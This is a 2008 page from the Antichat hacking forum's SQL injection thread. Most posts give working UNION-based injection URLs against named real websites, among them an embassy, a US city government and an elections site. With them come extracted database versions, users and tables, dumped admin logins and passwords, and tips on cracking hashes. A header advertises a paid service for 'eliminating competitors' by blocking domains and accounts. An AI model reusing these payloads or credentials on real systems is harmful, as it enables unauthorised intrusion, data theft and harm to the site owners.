Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 648 из 1242

648

Опции темы

Поиск в этой теме

Опции просмотра

#6471

27.08.2008, 13:16

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

Посольство Вьетнамское в Штатах.

Цитата:

http://viet.vietnamembassy.us/tintuc/index.php?category=93

Dbname: vnemb_news2004
Version:4.1.20-log
User:vnemb_3_r@209.68.2.136

#6472

27.08.2008, 15:57

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

Провел на форуме:
964766

Репутация: 228

Америкосовские сайтеги... ы)

http://www.fairelections.us

Код:

http://www.fairelections.us/article.php?id=-104+union+select+1,2,unhex(hex(version())),4,5--

version() - 5.0.45-community-log
user() - ourcoupl_fairele@localhost
database() - ourcoupl_fairelections

От вывода инфы я офигел. Еле-еле-еле нашел. В общем снизу слева есть ссылочка: "Printer Safe Version", смотрим ее и видим интересующую нас инфу.

Таблички перебираем лимитом limit+2,1 ; 3,1 и т.д.

Код:

http://www.fairelections.us/article.php?id=-104+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+2,1--

#6473

27.08.2008, 16:36

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

Провел на форуме:
964766

Репутация: 228

Ну что? Давайте пойдем покрупнее.

The City of Bremerton, WA

http://www.ci.bremerton.wa.us

На этом сайте я вообще вывода почти не нашел если бы НЕ циферка в коде, попавшаяся мне на глаза

Код:

http://www.ci.bremerton.wa.us/display.php?id=1039+union+select+1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14/*

version() - 4.1.12-log
user() - bremcity@localhost
database() - bremcity

Гуд выводы пошли, хорошо шифруются

#6474

27.08.2008, 16:56

Fugitif

Постоянный

Регистрация: 23.09.2007

Сообщений: 416

Провел на форуме:
1781065

Репутация: 869

Код:

http://www.host-sweet.com/profile/host.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/*

Цитата:

3 4.0.26-standard:ho8802_sweet:ho8802_hideki@localhost

Код:

http://www.demonews.de/artikel/index.php?artikel=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())/*

Цитата:

Special: 4.1.22-max-log:d001e7e3:d001e7e3@85.13.137.29

#6475

27.08.2008, 17:19

SeNaP

Участник форума

Регистрация: 07.08.2008

Сообщений: 281

Провел на форуме:
3300342

Репутация: 165

Код:

http://progmusic.ru/space/discography.php?id=-5+union+select+1,2,(concat_ws(0x3d,user_pass,user_fname,user_mail)),4,5,6,7,8+from+admin_users+limit+0,1--

Пасс=логин=мыло

вот только я с с паролями разобратся не смог, это же ведь не MD5, и как и брутить?

#6476

27.08.2008, 20:34

geforce

Постоянный

Регистрация: 21.08.2008

Сообщений: 302

Провел на форуме:
458686

Репутация: -25

Отправить сообщение для geforce с помощью ICQ

http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*
Так?

#6477

27.08.2008, 20:36

0nep@t0p

Участник форума

Регистрация: 25.05.2007

Сообщений: 147

Провел на форуме:
2313429

Репутация: 728

2 SeNaP
А хэши по-твоему только md5 в природе существуют ? По длине хэша, это скорее всего mysql хэш, брутить Passwords Pro
www.hashcracking.info рулит
43e9a4ab75570f5b : admin

2 geforse
Пипл, вы пистец, вы статьи читайте. С чего ты решил что полей 8 ? Unknown column '8' in 'order clause'
И для вопросов существует отдельная тема. Джифорс, читай статьи.
Эмм, сначала я прогнал, решив, что полей два. Пасиба .Begemot.'y, который меня поправил ^^

Последний раз редактировалось 0nep@t0p; 28.08.2008 в 01:07..

#6478

27.08.2008, 20:48

geforce

Постоянный

Регистрация: 21.08.2008

Сообщений: 302

Провел на форуме:
458686

Репутация: -25

Не выводит на полях http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*
version()

Что делать?

#6479

27.08.2008, 21:18

geforce

Постоянный

Регистрация: 21.08.2008

Сообщений: 302

Провел на форуме:
458686

Репутация: -25

Цитата:

Сообщение от jokester

geforce Личная просьба.Поищи другой сайт для экспериментов. Это сайт Осетии.

Я сам с осетии а сайт этот моей фирмы где я работаю моя задача найти дыру и покозать её! Я её нашел но вот возникает вопрос! Почему не выводит
http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*

version()???

#6480

27.08.2008, 21:57

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

http://www.maxivetlanda.se/view_2008.php?katid=-1+union+select+concat(0x3a3a,loginnamn,0x3a3a,lose nord,0x3a3a)+from+anv+limit+0,1/*

login: super password: duper

http://www.maxivetlanda.se/admin

Страница 648 из 1242

648

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход